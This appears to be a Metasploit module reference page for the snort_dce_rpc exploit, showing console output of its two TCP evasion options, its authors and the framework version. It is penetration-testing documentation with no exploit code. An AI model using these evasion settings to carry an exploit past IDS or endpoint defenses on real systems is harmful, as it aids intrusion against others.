Here is the full list of possible evasion options supported by the multi/ids/snort_dce_rpc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/ids/snort_dce_rpc) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

References

See Also

Check also the following modules related to this module:

Related Nessus plugins:

Authors

  • Neel Mehta
  • Trirat Puttaraksa
  • Carsten Maartmann-Moe <carsten[at]carmaa.com>
  • 0a29406d9794e4f9b30b3c5d6702c708

Version

This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.